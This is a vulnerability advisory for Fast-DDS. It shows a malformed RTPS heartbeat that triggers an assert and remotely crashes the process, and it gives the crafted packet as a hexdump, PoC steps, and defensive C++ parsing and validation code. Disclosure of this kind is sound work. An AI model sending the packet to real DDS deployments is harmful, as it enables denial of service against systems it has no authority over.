Summary
This was reported as #3236.
Opening an advisory for CVE assignment as per the request of Miguel.
Details
Hexdump of a (semantically) malformed RTPS heartbeat message:
```
0000 45 00 00 68 00 01 40 00 40 11 D9 76 80 3D F0 CF E..h..@.@..v.=..
0010 EF FF 00 01 05 39 1C E8 00 54 08 B9 52 54 50 53 .....9...T..RTPS
0020 02 04 01 0F 01 03 02 42 AC 11 00 02 45 E5 E2 FD .......B....E...
0030 07 BF 34 00 00 00 10 00 00 00 00 00 00 01 00 C2 ..4.............
0040 00 00 00 00 A7 9B EA 8C BE ED DC CB 00 03 00 00 ................
0050 77 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 w...............
0060 00 00 00 00 00 00 00 00 ........
```
This heartbeat submessage has bad sequence numbers, i.e.,
```
firstSN.high = 0xc2000100 // -1040187136
firstSN.low  = 0x00
lastSN.high  = 0x8cea9ba7
lastSN.low   = 0xcbdcedbe
```
The sanity check line at MessageReceiver.cpp:1057 invokes the - operator (firstSN - 1):
```cpp
#include <cassert>
#include <cstdint>

// SequenceNumber_t carries a signed 32-bit 'high' and an unsigned 32-bit 'low'.
inline SequenceNumber_t operator -(
        const SequenceNumber_t& seq,
        const uint32_t inc) noexcept
{
    SequenceNumber_t res(seq.high, seq.low - inc);
    if (inc > seq.low)
    {
        // Being the type of the parameter an 'uint32_t', the decrement of 'high' will be as much as 1.
        // 'high' comes straight from the wire here, so a remote peer can make it non-positive.
        assert(0 < res.high);
        --res.high;
    }
    return res;
}
```
in which inc (== 1) > seq.low (== 0) holds, so the borrow branch is entered and the assert() inside is triggered because 0 < res.high (== -1040187136) is false.
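The following is an added example, not Fast-DDS code: it decodes the heartbeat submessage from the hexdump above (the packet bytes are embedded as constructed data), reproduces the precondition of the operator- shown above without actually tripping an assert, and applies the receiver-side validity check a hardened parser would run first. The SequenceNumber_t layout (signed high, unsigned low), the RTPS header/submessage offsets and the heartbeat validity rule (firstSN >= 1 and lastSN >= firstSN - 1, from the RTPS specification) are assumptions of this example; all function names are hypothetical.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <cstring>

// Assumed to mirror the layout the advisory's operator- relies on.
struct SequenceNumber_t {
    int32_t high;
    uint32_t low;
};

struct Heartbeat {
    uint32_t reader_id;        // EntityId kept in wire (octet) order
    uint32_t writer_id;
    SequenceNumber_t first_sn;
    SequenceNumber_t last_sn;
    uint32_t count;
};

// The advisory's packet, constructed here from its hexdump: IPv4(20) + UDP(8) + RTPS.
const uint8_t kPacket[] = {
    0x45,0x00,0x00,0x68,0x00,0x01,0x40,0x00,0x40,0x11,0xD9,0x76,0x80,0x3D,0xF0,0xCF,
    0xEF,0xFF,0x00,0x01,0x05,0x39,0x1C,0xE8,0x00,0x54,0x08,0xB9,0x52,0x54,0x50,0x53,
    0x02,0x04,0x01,0x0F,0x01,0x03,0x02,0x42,0xAC,0x11,0x00,0x02,0x45,0xE5,0xE2,0xFD,
    0x07,0xBF,0x34,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0xC2,
    0x00,0x00,0x00,0x00,0xA7,0x9B,0xEA,0x8C,0xBE,0xED,0xDC,0xCB,0x00,0x03,0x00,0x00,
    0x77,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
};
const size_t kIpUdpLen = 28;   // RTPS payload begins after the IP and UDP headers

static uint32_t rd32(const uint8_t* p, bool little) {
    return little
        ? ((uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24))
        : ((uint32_t)p[3] | ((uint32_t)p[2] << 8) | ((uint32_t)p[1] << 16) | ((uint32_t)p[0] << 24));
}

static SequenceNumber_t rd_sn(const uint8_t* p, bool little) {
    SequenceNumber_t s;
    s.high = (int32_t)rd32(p, little);   // wire bits land in the signed field unchanged
    s.low = rd32(p + 4, little);
    return s;
}

// Parse the first submessage of an RTPS message as a HEARTBEAT.
// `rtps` points at the "RTPS" magic. Returns false on any structural problem.
bool parse_heartbeat(const uint8_t* rtps, size_t len, Heartbeat& hb) {
    const size_t kHdr = 20;    // magic(4) + version(2) + vendorId(2) + guidPrefix(12)
    const size_t kSubHdr = 4;  // submessageId, flags, octetsToNextHeader
    const size_t kBody = 28;   // readerId, writerId, firstSN, lastSN, count
    if (len < kHdr + kSubHdr + kBody || std::memcmp(rtps, "RTPS", 4) != 0) return false;
    const uint8_t* sub = rtps + kHdr;
    if (sub[0] != 0x07) return false;             // 0x07 = HEARTBEAT
    const bool little = (sub[1] & 0x01) != 0;     // E flag selects the body's endianness
    const uint16_t octets = little ? (uint16_t)(sub[2] | (sub[3] << 8))
                                   : (uint16_t)(sub[3] | (sub[2] << 8));
    if (octets < kBody || kHdr + kSubHdr + octets > len) return false;
    const uint8_t* b = sub + kSubHdr;
    hb.reader_id = rd32(b, false);                // EntityIds are octet arrays, never swapped
    hb.writer_id = rd32(b + 4, false);
    hb.first_sn = rd_sn(b + 8, little);
    hb.last_sn = rd_sn(b + 16, little);
    hb.count = rd32(b + 24, little);
    return true;
}

// Convenience for callers and tests: the heartbeat decoded from kPacket.
Heartbeat advisory_heartbeat() {
    Heartbeat hb{};
    parse_heartbeat(kPacket + kIpUdpLen, sizeof(kPacket) - kIpUdpLen, hb);
    return hb;
}

// Mirrors the precondition of the advisory's operator-(seq, 1): its assert
// fires when the borrow path is taken (1 > low) and high is not positive.
bool minus_one_would_assert(const SequenceNumber_t& seq) {
    return (1u > seq.low) && !(0 < seq.high);
}

// Receiver-side validity check, run before any SequenceNumber_t arithmetic:
// both numbers non-negative, firstSN >= 1 and lastSN >= firstSN - 1.
bool heartbeat_is_sane(const Heartbeat& hb) {
    if (hb.first_sn.high < 0 || hb.last_sn.high < 0) return false;
    const uint64_t first = ((uint64_t)(uint32_t)hb.first_sn.high << 32) | hb.first_sn.low;
    const uint64_t last = ((uint64_t)(uint32_t)hb.last_sn.high << 32) | hb.last_sn.low;
    if (first < 1) return false;
    return last >= first - 1;
}

int main() {
    const Heartbeat hb = advisory_heartbeat();
    std::printf("firstSN = {%d, %u}  lastSN = {%d, %u}  count = %u\n",
                hb.first_sn.high, hb.first_sn.low, hb.last_sn.high, hb.last_sn.low, hb.count);
    std::printf("operator-(firstSN, 1) would assert: %s\n", minus_one_would_assert(hb.first_sn) ? "yes" : "no");
    std::printf("heartbeat passes validity check: %s\n", heartbeat_is_sane(hb) ? "yes" : "no");
    return 0;
}
```

Rejecting the submessage on heartbeat_is_sane() failing, before firstSN - 1 is ever computed, turns the remote assert into a dropped packet; the check is cheap because both sequence numbers are already in hand once the body is decoded.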
PoC
Run any fastdds process on domain 0.
Send the RTPS packet above to 127.0.0.1:7400.
Impact
This can remotely crash any Fast-DDS process.